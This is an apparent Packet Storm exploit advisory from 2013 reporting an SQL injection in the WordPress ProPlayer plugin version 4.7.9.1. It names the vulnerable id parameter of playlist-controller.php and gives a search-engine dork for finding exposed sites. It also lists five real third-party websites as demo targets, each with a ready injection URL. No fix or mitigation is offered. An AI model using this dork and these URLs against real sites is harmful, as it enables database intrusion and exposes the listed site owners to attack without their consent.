WordPress ProPlayer Plugin SQL Injection

2013-05-20T00:00:00
ID PACKETSTORM:121689
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-05-20T00:00:00

Description

                                        
                                            `##############  
# Exploit Title : WordPress ProPlayer Plugin SQL Injection  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Plugin Link : http://wordpress.org/plugins/proplayer/  
#  
# Home : www.ashiyane.org  
#  
# Security Risk : High  
#  
# Version : 4.7.9.1  
#  
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=  
#  
# Tested on: Linux  
#  
##############  
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]  
#  
#  
#DEm0:  
# http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27  
#  
# http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27  
#  
# http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27  
#  
# http://www.rogerseifert.com/wp-content/plugins/proplayer/playlist-controller.php?id=51-0%27  
#  
# http://www.nickyhager.info/wp-content/plugins/proplayer/playlist-controller.php?id=750-0%27  
#  
##############  
#Greetz to: My Lord ALLAH  
##############  
#  
# Amirh03in  
#  
##############   
`